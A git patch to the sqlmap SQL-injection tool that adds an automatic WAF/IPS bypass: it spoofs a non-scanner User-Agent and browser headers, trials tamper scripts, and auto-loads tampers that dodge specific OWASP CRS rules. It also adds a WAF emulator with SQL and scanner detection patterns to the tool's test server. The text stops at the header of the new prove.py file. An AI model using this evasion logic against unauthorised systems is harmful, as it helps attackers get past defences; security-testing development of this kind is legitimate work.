From 14041335380daea2ba44dcf1826bde23a85d50d1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Miroslav=20=C5=A0tampar?= Date: Wed, 17 Jun 2026 15:58:08 +0200 Subject: [PATCH] Add --prove, opt-in --auto-tamper WAF bypass, and blindbinary/infoschema2innodb tampers --- data/txt/sha256sums.txt | 25 ++- extra/vulnserver/vulnserver.py | 65 ++++++ lib/controller/action.py | 36 ++++ lib/controller/checks.py | 21 +- lib/controller/controller.py | 67 ++++++- lib/core/enums.py | 1 + lib/core/option.py | 1 + lib/core/optiondict.py | 1 + lib/core/settings.py | 29 ++- lib/core/testing.py | 6 + lib/parse/cmdline.py | 3 + lib/utils/prove.py | 351 +++++++++++++++++++++++++++++++++ lib/utils/wafbypass.py | 156 +++++++++++++++ tamper/blindbinary.py | 114 +++++++++++ tamper/infoschema2innodb.py | 50 +++++ tests/test_wafbypass.py | 81 ++++++++ 16 files changed, 992 insertions(+), 15 deletions(-) create mode 100644 lib/utils/prove.py create mode 100644 lib/utils/wafbypass.py create mode 100644 tamper/blindbinary.py create mode 100644 tamper/infoschema2innodb.py create mode 100644 tests/test_wafbypass.py diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt index e878ab6d6..1f1e5bbd0 100644 --- a/data/txt/sha256sums.txt +++ b/data/txt/sha256sums.txt @@ -160,10 +160,10 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/ df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh 1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py -072a2c19162cc4e76476cf474134f18a5ec45cce9a4e4d216dad8e7a71ece048 extra/vulnserver/vulnserver.py -b8411d1035bb49b073476404e61e1be7f4c61e205057730e2f7880beadcd5f60 lib/controller/action.py -6da812281a69c8b7a5181c2f76374dc695e4727b2936042651bacbeda4e6bcc9 lib/controller/checks.py -969737ac9cd3fa7bac8b582a85016bd348ba2087daa3644a570a9127e686363b lib/controller/controller.py +63657c00a046ca0fb28fd069407ab6305bd7b95c42f26a96ed083fd05b152252 extra/vulnserver/vulnserver.py +3abecaec1a9c59645a4821463a2d761235f7a4f763a491f188a41a083bbddd98 lib/controller/action.py +6574ed70c7fe0ac305dbc85ed7102f648b6a3f42fe2fe6b89172d69717327149 lib/controller/checks.py +dcd4adcd7a2447a624ca7927541941d25767a4581af2d762c3197dc93790f4df lib/controller/controller.py d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py b36b085ff1b5797e375c1e2ca3b12c7ab4204f48acd1a1efb075cff8302d9750 lib/core/agent.py @@ -177,30 +177,30 @@ c03dc585f89642cfd81b087ac2723e3e1bb3bfa8c60e6f5fe58ef3b0113ebfe6 lib/core/data. 147823c37596bd6a56d677697781f34b8d1d1671d5a2518fbc9468d623c6d07d lib/core/defaults.py 2f44a1bfe6f18aafe64147b99e69aa93cf438c0e7befe59f4e2aee9065c8b7b6 lib/core/dicts.py 2592b0fd38c272c0b0d49878f4449437eb8ba8ff7536bb39b2ac9a2511010f7c lib/core/dump.py -6b9932d9c789a0e2ac28a493fb7914f49100a1c91de989bcdb20df9d40648522 lib/core/enums.py +e4f92e09737ff0dda7ec30e0db1912570e252853b3af9b8f2b9f68ad33cf09fe lib/core/enums.py 5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py 914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py -3ec59b5eb336d9808d28496f1cbbad716b4a0e276b5399023142826e460e3fd2 lib/core/optiondict.py -b61676f0aa44798aaf9be72ff37550e2b78ed6ad3c71fbcad54f8c8bf7b34096 lib/core/option.py +06651cff25422dcb84c159f80faf8dc377d82ddd451b5910f12c4c6a3ebe1e94 lib/core/optiondict.py +e3a3729a24306b7ecace614fe27a8123c0becb0c5283ca519e5bcf376af2c711 lib/core/option.py ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch.py 49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py 03db48f02c3d07a047ddb8fe33a757b6238867352d8ddda2a83e4fec09a98d04 lib/core/readlineng.py 48797d6c34dd9bb8a53f7f3794c85f4288d82a9a1d6be7fcf317d388cb20d4b3 lib/core/replication.py 0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py 888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py -222177a7a8e4c16ec4eae9f9542794ebf46a34b29390e967fe9fc26189261372 lib/core/settings.py +f01361d999b0cf89b8418265c4a4962924fcc03a6b87e15b39c0836788725e85 lib/core/settings.py cd5a66deee8963ba8e7e9af3dd36eb5e8127d4d68698811c29e789655f507f82 lib/core/shell.py bcb5d8090d5e3e0ef2a586ba09ba80eef0c6d51feb0f611ed25299fbb254f725 lib/core/subprocessng.py 70ea3768f1b3062b22d20644df41c86238157ec80dd43da40545c620714273c6 lib/core/target.py -40b703993441fcd10ab06545b7dbe4a4762ab1ff517592a7e104a52785e62586 lib/core/testing.py +c39dae0602b356d42f55df369c05614bbfb00c2abf2f0419fefe2ae781aa3098 lib/core/testing.py e3e653364d08d04d7492aa40a2bd29c6a28f4d78fecdd6c10f21f6cb28b98b4c lib/core/threads.py b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py 53e396902cb2546eaa09e77073fcba8be8827ee9ce055cfc899e81b0e6ad4d6d lib/core/update.py 2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py 54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py -053079fe796dfce09cf94ac6f094043f2dfa393b5631387fadb4f735cf1ac6a4 lib/parse/cmdline.py +14b2fcfa2d6c3a155e3b85f093929c6129893ad191d1988a717daa1ffbb422e7 lib/parse/cmdline.py 02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py 5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py @@ -254,6 +254,7 @@ a94958be0ec3e9d28d8171813a6a90655a9ad7e6aa33c661e8d8ebbfcf208dbb lib/utils/deps 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/utils/__init__.py e7d31de0e268c129ee11c590eb618f73a85e1022c08b8ed1f77753043c949214 lib/utils/pivotdumptable.py c1dfc3bed0fed9b181f612d1d747955dd2b506dbe99bc9fd481495602371473a lib/utils/progress.py +0aeb890fb6b0783f25df7c1ba7c9d0098325b4f7a677ff0151e411be24760f04 lib/utils/prove.py 2cd84db16edef8c9948e197a51d870cf1c338f4a89037b4d422de990f4a45237 lib/utils/purge.py f635872093a12cd63a72d77adf88e8f8cd4084a5cc64384f12966cd75a499bdf lib/utils/safe2bin.py de4be7e291db0962cd59f9c04b3f7259f846e315df1fd9b323954f89fae0b2db lib/utils/search.py @@ -262,6 +263,7 @@ de4be7e291db0962cd59f9c04b3f7259f846e315df1fd9b323954f89fae0b2db lib/utils/sear f0e5525a92fe971defc8f74c27942ff9138b1e8251f2e0d9a8bd59285b656084 lib/utils/timeout.py f821dc39a75ea48dccfa758788de15d38b9ca6a780a98f59935fb6610f75508c lib/utils/tui.py e430db49aa768ff2cdba76932e30871c366054599c44d91580dde459ab9b6fef lib/utils/versioncheck.py +b3c5109394f6c3cdd73a524a737b36cca7ecc56619f2a5f801eb1e7f1bfdb78b lib/utils/wafbypass.py 1b439fc59fd202c21c74978ed9f36d1c309533226c77907eae159461525f9fef lib/utils/xrange.py b1bbb62f5b272a6247d442d5e4f644a5bca7138e70776539ec84a5a90433fd13 LICENSE 6b1828a80ae3472f1adb53a540dee0835eccac14f8cfc4bf73962c4e49a49557 plugins/dbms/access/connector.py @@ -501,6 +503,7 @@ cf26bc8006519bd25ce06d347f72770cd75b61575cf65e5812274e8ab9392eb4 tamper/apostro 11ad15d66c43f32f5d0a39052e5f623a4752ad4fb275d642f2e4cd841ff82b41 tamper/base64encode.py 1b55b7c59c623411c8cf328fff9e7de96a2dfc48ef4e5455325bfd41aebbbc13 tamper/between.py 6e72b92662185a56847cca235106bc354bd6a10e3e89a135b9ea8fa09cd8eb34 tamper/binary.py +3fb1a7f8a37d8a49fb88fa880e163ff75a2b224c4a7799abe29bec1a367d5273 tamper/blindbinary.py f833cfbb53e6849ed1b3b554ec1c973f85e6d41ebd62f94f8e0dcf0ba5da2f49 tamper/bluecoat.py 69c7eb987dec666da227ee1024c31b89ad324a3f7cab287ada6dade7f51c8a36 tamper/chardoubleencode.py c7892bff56b2b85dfdf9f24c783c569edac57a3fd5a254cf4554987a374206c9 tamper/charencode.py @@ -524,6 +527,7 @@ d05dafb86e82807e75bb8f54dcd6afbb4a08ba3b83b35562fee7f7022a75dbd7 tamper/if2case 55092820a856f583cf1b661001b60216886d172cb7d0008920bf4ab3df88aff0 tamper/ifnull2casewhenisnull.py eeda2b2fd54a4aa5fcf5630f8bfae43e0a38a840ae908e2f6b0878959067413c tamper/ifnull2ifisnull.py 94fe273bee7df27c9b4f1ee043779d06e4553169d9aec30c301d469275883dd1 tamper/informationschemacomment.py +ff07320cb134520c3be99407b5c1e67528f944c6a12838ab583716622e877a95 tamper/infoschema2innodb.py 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 tamper/__init__.py 017c91ba64c669382aa88ce627f925b00101a81c1a37a23dba09bfa2bfaf42ae tamper/least.py d762543ef6d90fd6ce8b897fdfb864e0461d2941922d331d97a334aefdbbe291 tamper/lowercase.py @@ -606,6 +610,7 @@ b3e13febe9e0ff6f97334f2868655bfdbaa18755e464a6dc4c6d424f513bad02 tests/test_tar 4b646f513c6da1e33200184ed6eabe0aa345eb2e2a19598dc123e191168591bf tests/test_urls.py 23ffd75b5aec33066e6d6aad01ab2c9c1b12ee20c1a0990f8f1be81f1ad16161 tests/_testutils.py 2364db35025a53ea4e5a0a80c034997642785f7e6d1566d0d0f1db959fe3c82e tests/test_utils.py +93ef9944effc62d4f744c57bd643137c90fd92205c6a6cbe891e0e99efb80a7f tests/test_wafbypass.py 81bb6d7449f224fa337734ae361c1a340bf9a51768a854d6a1a6e718ed1263ca tests/test_wordlist.py 55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py index 05cdab2ef..47ba2cb0b 100644 --- a/extra/vulnserver/vulnserver.py +++ b/extra/vulnserver/vulnserver.py @@ -24,6 +24,7 @@ UNICODE_ENCODING = "utf-8" DEBUG = False if PY3: + from http.client import FORBIDDEN from http.client import INTERNAL_SERVER_ERROR from http.client import NOT_FOUND from http.client import OK @@ -35,6 +36,7 @@ if PY3: else: from BaseHTTPServer import BaseHTTPRequestHandler from BaseHTTPServer import HTTPServer + from httplib import FORBIDDEN from httplib import INTERNAL_SERVER_ERROR from httplib import NOT_FOUND from httplib import OK @@ -157,6 +159,53 @@ class ThreadingServer(ThreadingMixIn, HTTPServer): if DEBUG: traceback.print_exc() +# Primitive (CRS-style) WAF/IPS emulator used to exercise the automatic WAF/IPS bypass. The request +# surface is normalized like a real WAF (lowercase, comments->space, whitespace compressed) BEFORE +# a cumulative anomaly score is summed; when the score reaches the per-level threshold the request +# is blocked (403 + marker). The rules are shaped so that camouflage tampers (case/whitespace/ +# comments) are normalized away and a *structural* substitution (e.g. 'between'/'equaltolike', +# which removes the scored '=' operator) is the genuine bypass - matching real-world behavior. +# +# The emulator also models the OTHER real-world dimension: a scanner-fingerprint rule (mirroring +# CRS 913100) adds a constant score for a recognizable scanner User-Agent that *stacks* with the +# payload score. Its weight is below every threshold, so the scanner UA alone never blocks (benign +# browsing passes), but it tips an otherwise-permitted payload over the threshold - so neutralizing +# the request fingerprint (a non-scanner User-Agent) is itself a genuine bypass, with no SQL tamper. +WAF_NUMERIC_COMPARISON = r"\d+\s*=\s*\d+" # numeric self-comparison (boolean payloads); the structural lever 'between'/'equaltolike' removes it +WAF_RULES = ( + (r"\bunion\b.{0,40}\bselect\b", 6), + (r"\binformation_schema\b", 5), + (r"\b(sleep|benchmark|extractvalue|updatexml|xp_cmdshell|waitfor)\b", 5), + (r"\b(select|insert|update|delete|drop)\b", 3), + (WAF_NUMERIC_COMPARISON, 4), + (r" cumulative score that triggers a block +WAF_SCANNER_UA = r"(?i)\b(?:sqlmap|nikto|nessus|acunetix|nmap|masscan|w3af|havij|wpscan|dirbuster|arachni)\b" +WAF_SCANNER_UA_WEIGHT = 3 # CRS 913100-style: constant score for a scanner User-Agent, stacked with the payload score + +# Levels 4-5 model a libinjection-class WAF (e.g. OWASP CRS rule 942100): ANY boolean-comparison +# fingerprint scores a flat amount REGARDLESS of operator, so '=','LIKE','BETWEEN','IN' are all +# caught equally - structural tampers (between/equaltolike) do NOT help. There, neutralizing the +# scanner fingerprint is the only payload-preserving bypass (level 4); when even that is not enough +# the search must bail honestly (level 5). This mirrors the hardest real-world case. +WAF_LIBINJECTION_LEVELS = (4, 5) +WAF_LIBINJECTION_WEIGHT = 5 +WAF_LIBINJECTION = r"(?i)\b(?:and|or)\b.{0,40}(?:=|>|<|\blike\b|\bbetween\b|\bin\b|\brlike\b|\bregexp\b)" + +def waf_score(value, ua=None, level=0): + value = (value or "").lower() + value = re.sub(r"/\*.*?\*/", " ", value) # t:replaceComments (note: -> single space, not empty) + value = re.sub(r"(?:--|#)[^\n]*", " ", value) # t:removeComments (line comments) + value = re.sub(r"\s+", " ", value) # t:compressWhitespace + libinjection = level in WAF_LIBINJECTION_LEVELS + retVal = sum(weight for (pattern, weight) in WAF_RULES if not (libinjection and pattern == WAF_NUMERIC_COMPARISON) and re.search(pattern, value)) + if libinjection and re.search(WAF_LIBINJECTION, value): # operator-agnostic comparison score (tampers cannot remove it) + retVal += WAF_LIBINJECTION_WEIGHT + if ua and re.search(WAF_SCANNER_UA, ua): # scanner-fingerprint score, stacked with the payload score + retVal += WAF_SCANNER_UA_WEIGHT + return retVal + class ReqHandler(BaseHTTPRequestHandler): def do_REQUEST(self): path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "") @@ -198,6 +247,22 @@ class ReqHandler(BaseHTTPRequestHandler): self.url, self.params = path, params + # primitive WAF/IPS emulator (opt-in via 'security_level' param; 0/absent = off) + try: + level = int(self.params.get("security_level", 0) or 0) + except (TypeError, ValueError): + level = 0 + + if level > 0: + surface = "%s %s" % (unquote_plus(query), getattr(self, "data", "") or "") + if waf_score(surface, ua=self.params.get("user-agent"), level=level) >= WAF_THRESHOLD.get(level, 2): + self.send_response(FORBIDDEN) + self.send_header("Content-type", "text/html; charset=%s" % UNICODE_ENCODING) + self.send_header("Connection", "close") + self.end_headers() + self.wfile.write(b"Request blocked: security policy violation (WAF)") + return + if self.url == "/csrf": if self.params.get("csrf_token") == _csrf_token: self.url = "/" diff --git a/lib/controller/action.py b/lib/controller/action.py index a1413a622..b61535481 100644 --- a/lib/controller/action.py +++ b/lib/controller/action.py @@ -8,11 +8,14 @@ See the file 'LICENSE' for copying permission from lib.controller.handler import setHandler from lib.core.common import Backend from lib.core.common import Format +from lib.core.common import hashDBWrite from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.enums import CONTENT_TYPE +from lib.core.enums import DBMS +from lib.core.enums import HASHDB_KEYS from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapUnsupportedDBMSException from lib.core.settings import SUPPORTED_DBMS @@ -30,8 +33,41 @@ def action(): # First of all we have to identify the back-end database management # system to be able to go ahead with the injection + # automatic WAF-bypass: if a WAF/IPS is present and the back-end DBMS is already indicated by the error + # page or the heuristic checks, skip active fingerprinting (the WAF would just block its payloads + # and flood the run with 403s) and assume that DBMS, so the user gets a usable result + if kb.wafBypass and not conf.forceDbms: + fallback = Backend.getErrorParsedDBMSes() or ([kb.heuristicDbms] if kb.heuristicDbms else []) + fallback = next((_ for _ in fallback if _ and _.lower() in SUPPORTED_DBMS), None) + if fallback: + logger.warning("skipping active back-end DBMS fingerprinting behind the WAF/IPS and assuming '%s' from error/heuristic detection" % fallback) + conf.forceDbms = fallback + setHandler() + if kb.wafBypass and Backend.getDbms(): # persist the assumed DBMS so a resumed run restores it instead of re-fingerprinting (and dead-ending) behind the WAF + hashDBWrite(HASHDB_KEYS.DBMS, Backend.getDbms()) + + # automatic WAF-bypass: with MySQL behind the WAF, make data retrieval AND table enumeration survive a + # libinjection-class WAF (e.g. OWASP CRS), verified end-to-end through ModSecurity/CRS: + # * fingerprinting was skipped, so flag has_information_schema (modern MySQL >=5.0 always has it) - + # otherwise enumeration wrongly assumes 'MySQL < 5.0' and bails with "no tables"; + # * 'blindbinary' reshapes the single-character read ORD(MID())->RIGHT(LEFT())>BINARY 0x.. (sheds the + # ORD/MID function names scored by 942151/942190); + # * 'infoschema2innodb' moves table enumeration off 'information_schema' (scored by 942140) onto + # 'mysql.innodb_table_stats', which is not on those blocklists. + # (blindbinary also reshapes PostgreSQL, but full extraction through the CRS proxy garbles there - an + # open issue - so PG is not auto-applied; it stays available as manual '--tamper=blindbinary'.) + if kb.wafBypass and Backend.getIdentifiedDbms() == DBMS.MYSQL: + kb.data.has_information_schema = True + if not conf.tamper: + from lib.utils.wafbypass import loadTamper + for _name in ("blindbinary", "infoschema2innodb"): + function = loadTamper(_name) + if function is not None and function not in (kb.tamperFunctions or []): + kb.tamperFunctions = (kb.tamperFunctions or []) + [function] + logger.info("using tamper scripts 'blindbinary' and 'infoschema2innodb' so data retrieval and table enumeration can pass the WAF/IPS") + if not Backend.getDbms() or not conf.dbmsHandler: htmlParsed = Format.getErrorParsedDBMSes() diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 328b457a8..f74acb796 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1351,6 +1351,10 @@ def checkWaf(): warnMsg = "previous heuristics detected that the target " warnMsg += "is protected by some kind of WAF/IPS" logger.critical(warnMsg) + if hashDBRetrieve(HASHDB_KEYS.CHECK_WAF_BYPASS, True): # re-apply a previously accepted automatic bypass + from lib.utils.wafbypass import neutralizeFingerprint + kb.wafBypass = True + neutralizeFingerprint() return _ if not kb.originalPage: @@ -1393,6 +1397,7 @@ def checkWaf(): hashDBWrite(HASHDB_KEYS.CHECK_WAF_RESULT, retVal, True) + if retVal: if not kb.identifiedWafs: warnMsg = "heuristics detected that the target " @@ -1406,9 +1411,19 @@ def checkWaf(): if not choice: raise SqlmapUserQuitException else: - if not conf.tamper: - warnMsg = "please consider usage of tamper scripts (option '--tamper')" - singleTimeWarnMessage(warnMsg) + if not conf.tamper and not kb.tamperFunctions: + message = "do you want sqlmap to try to automatically bypass the WAF/IPS during " + message += "the run (e.g. by using a non-scanner User-Agent and tamper script(s))? [Y/n] " + kb.wafBypass = readInput(message, default='Y', boolean=True) + hashDBWrite(HASHDB_KEYS.CHECK_WAF_BYPASS, kb.wafBypass, True) + if kb.wafBypass: + # apply it up-front so the whole run (detection included) avoids the scanner + # fingerprint, instead of getting blocked first and only then retrying + from lib.utils.wafbypass import neutralizeFingerprint + neutralizeFingerprint() + logger.info("using a random (non-scanner) User-Agent and browser-like headers to bypass the WAF/IPS") + else: + singleTimeWarnMessage("please consider manual usage of tamper scripts (option '--tamper')") return retVal diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 584158236..afe65d9d7 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -76,6 +76,7 @@ from lib.core.settings import IGNORE_PARAMETERS from lib.core.settings import LOW_TEXT_PERCENT from lib.core.settings import REFERER_ALIASES from lib.core.settings import USER_AGENT_ALIASES +from lib.core.settings import WAF_BYPASS_MAX_TRIALS from lib.core.target import initTargetEnv from lib.core.target import setupTargetEnv from lib.utils.hash import crackHashFile @@ -168,6 +169,57 @@ def _formatInjection(inj): return data +def _autoWafBypass(place, parameter, value): + """ + Automatic WAF/IPS bypass (offered interactively once a WAF/IPS is detected, cached in + kb.wafBypass). The request fingerprint has already been neutralized up-front (non-scanner + User-Agent, see checkWaf), so here the empirically-ranked candidate tamper scripts are trialled + and the first that RESTORES a confirmed injection is adopted. Re-running checkSqlInjection() + through a candidate is itself the validation - it succeeds only if the resulting payload both + passes the WAF and stays valid SQL, so junk/incompatible candidates are rejected automatically. + """ + + from lib.utils.wafbypass import candidateTampers, loadTamper + + retVal = None + + savedTamper = kb.tamperFunctions + savedTechnique = conf.technique + conf.technique = [PAYLOAD.TECHNIQUE.BOOLEAN] # bound each trial to a quick boolean re-check + + candidates = candidateTampers(identifiedWafs=kb.identifiedWafs) + + try: + for count, name in enumerate(candidates): + if count >= WAF_BYPASS_MAX_TRIALS: + break + + function = loadTamper(name) + if function is None: + continue + + kb.tamperFunctions = [function] + logger.info("trying to bypass the WAF/IPS with tamper script '%s'" % name) + + injection = checkSqlInjection(place, parameter, value) + if getattr(injection, "place", None) is not None and NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes: + logger.info("bypassed the WAF/IPS by using tamper script '%s' (with a non-scanner User-Agent)" % name) + logger.info("the same result can be reproduced manually with switch '--random-agent' and tamper script '%s'" % name) + retVal = injection + return retVal + + if kb.droppingRequests and count >= 2: + logger.warning("target keeps dropping requests; giving up on the WAF/IPS bypass") + break + finally: + conf.technique = savedTechnique + if retVal is None: # nothing worked - leave tampering untouched + kb.tamperFunctions = savedTamper + # honest bail: say it could not be bypassed and what to try manually + logger.warning("unable to automatically bypass the WAF/IPS; it might be using behavioral or rate-based detection (consider a manual '--tamper' selection, '--delay', or '--proxy' rotation)") + + return retVal + def _showInjections(): if conf.wizard and kb.wizardMode: kb.wizardMode = False @@ -626,6 +678,14 @@ def start(): logger.info(infoMsg) injection = checkSqlInjection(place, parameter, value) + + # WAF/IPS bypass accepted: the parameter looks injectable (heuristics) but + # the standard payloads were blocked -> try to auto-bypass it (request + # fingerprint neutralization and/or a tamper script) + if getattr(injection, "place", None) is None and kb.wafBypass and check == HEURISTIC_TEST.POSITIVE \ + and not conf.tamper and not kb.tamperFunctions: + injection = _autoWafBypass(place, parameter, value) or injection + proceed = not kb.endDetection injectable = False @@ -754,7 +814,12 @@ def start(): condition = True if condition: - action() + try: + action() + finally: + if conf.prove: + from lib.utils.prove import proveExploitation + proveExploitation() except KeyboardInterrupt: if kb.lastCtrlCTime and (time.time() - kb.lastCtrlCTime < 1): diff --git a/lib/core/enums.py b/lib/core/enums.py index 137be5d02..ed3325025 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -288,6 +288,7 @@ class HASHDB_KEYS(object): DBMS = "DBMS" DBMS_FORK = "DBMS_FORK" CHECK_WAF_RESULT = "CHECK_WAF_RESULT" + CHECK_WAF_BYPASS = "CHECK_WAF_BYPASS" CHECK_NULL_CONNECTION_RESULT = "CHECK_NULL_CONNECTION_RESULT" CONF_TMP_PATH = "CONF_TMP_PATH" KB_ABS_FILE_PATHS = "KB_ABS_FILE_PATHS" diff --git a/lib/core/option.py b/lib/core/option.py index 516a82ee1..118ba15ae 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2237,6 +2237,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.udfFail = False kb.unionDuplicates = False kb.unionTemplate = None + kb.wafBypass = None kb.webSocketRecvCount = None kb.wizardMode = False kb.xpCmdshellAvailable = False diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index c7e8c9717..1631bd051 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -100,6 +100,7 @@ optDict = { "prefix": "string", "suffix": "string", "tamper": "string", + "prove": "boolean", }, "Detection": { diff --git a/lib/core/settings.py b/lib/core/settings.py index 92280490b..1d06f132f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from lib.core.enums import OS from thirdparty import six # sqlmap version (...) -VERSION = "1.10.6.119" +VERSION = "1.10.6.120" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -54,6 +54,33 @@ IPS_WAF_CHECK_RATIO = 0.5 # Timeout used in heuristic check for WAF/IPS protected targets IPS_WAF_CHECK_TIMEOUT = 10 +# Candidate tamper scripts for automatic WAF-bypass, ordered by empirical WAF-bypass value +# (structural token-substitution first, camouflage last; per identYwaf data). The back-end DBMS +# is not pre-filtered here: semantics-preservation is verified at runtime by re-running detection +# through each candidate, so a DBMS-incompatible script simply fails the trial and is discarded. +WAF_BYPASS_TAMPERS = ( + "equaltolike", + "between", + "greatest", + "charencode", + "randomcase", + "space2comment", + "versionedkeywords", + "space2hash", +) + +# Maximum number of candidate tamper (chains) trialled during automatic WAF-bypass +WAF_BYPASS_MAX_TRIALS = 8 + +# Browser-like request headers applied alongside the random (non-scanner) User-Agent during +# automatic WAF bypass: sqlmap's defaults ('Accept: */*', no 'Accept-Language') are themselves a +# non-browser tell that header/behavioral WAFs key on, so the whole request fingerprint - not just +# the UA - is made to look like a real browser. Kept standard so it cannot skew content negotiation. +WAF_BYPASS_HTTP_HEADERS = ( + ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"), + ("Accept-Language", "en-US,en;q=0.5"), +) + # Timeout used in checking for existence of live-cookies file LIVE_COOKIES_TIMEOUT = 120 diff --git a/lib/core/testing.py b/lib/core/testing.py index 265104231..8ab1aaa1a 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -56,6 +56,12 @@ def vulnTest(): ("-u \"&id2=1\" -p id2 -v 5 --flush-session --level=5 --text-only --test-filter=\"AND boolean-based blind - WHERE or HAVING clause (MySQL comment)\"", ("~1AND",)), ("--list-tampers", ("between", "MySQL", "xforwardedfor")), ("-u \"&json=1\" -p id --flush-session --technique=B --banner", ("Type: boolean-based blind", "banner: '3.")), # JSON-response detection via the structure-aware oracle (no --string hint) + ("-u --data=\"security_level=1\" -p id --flush-session --technique=B --banner", ("random (non-scanner) User-Agent and browser-like headers to bypass the WAF/IPS", "Type: boolean-based blind", "banner: '3.")), # automatic WAF-bypass: request-fingerprint dimension (a non-scanner User-Agent, applied up-front, restores detection) + ("-u --data=\"security_level=2\" -p id --flush-session --technique=B --banner", ("bypassed the WAF/IPS by using tamper script", "reproduced manually with switch '--random-agent' and tamper script", "Type: boolean-based blind", "banner: '3.")), # automatic WAF-bypass: SQL-tamper dimension (structural substitution) on top of the non-scanner User-Agent + ("-u --data=\"security_level=3\" -p id --flush-session --technique=B", ("bypassed the WAF/IPS by using tamper script", "Type: boolean-based blind")), # automatic WAF-bypass: SQL-tamper dimension at a stricter signature threshold + ("-u --data=\"security_level=4\" -p id --flush-session --technique=B --banner", ("random (non-scanner) User-Agent and browser-like headers to bypass the WAF/IPS", "Type: boolean-based blind", "banner: '3.")), # automatic WAF-bypass against a libinjection-class WAF: tampers cannot help, only the non-scanner User-Agent does + ("-u --data=\"security_level=5\" -p id --flush-session --technique=B", ("unable to automatically bypass the WAF/IPS", "does not seem to be injectable")), # automatic WAF-bypass honest bail: a libinjection-class WAF that no User-Agent or tamper can defeat + ("-u -p id --flush-session --prove", ("sqlmap proved exploitation of the following injection point", "Parameter: id (GET)", "Technique: boolean-based blind", "TRUE (5/5)", "repeatably", "Retrieved: back-end DBMS banner '3.")), # --prove: report-grade proof in the injection-point style - forces the boolean technique (so a multi-technique point still proves), and actively reads a value out as the strongest proof ("-r --flush-session -v 5 --test-skip=\"heavy\" --save=", ("CloudFlare", "web application technology: Express", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind", "saved command line options to the configuration file")), ("-c ", ("CloudFlare", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind")), ("-l --flush-session --keep-alive --skip-waf -vvvvv --technique=U --union-from=users --banner --parse-errors", ("banner: '3.", "ORDER BY term out of range", "~xp_cmdshell", "Connection: keep-alive")), diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 648235604..f3e99ecf4 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -375,6 +375,9 @@ def cmdLineParser(argv=None): injection.add_argument("--tamper", dest="tamper", help="Use given script(s) for tampering injection data") + injection.add_argument("--prove", dest="prove", action="store_true", + help="Prove exploitation of the detected injection point(s)") + # Detection options detection = parser.add_argument_group("Detection", "These options can be used to customize the detection phase") diff --git a/lib/utils/prove.py b/lib/utils/prove.py new file mode 100644 index 000000000..f435e6b37 --- /dev/null +++ b/lib/utils/prove.py @@ -0,0 +1,351 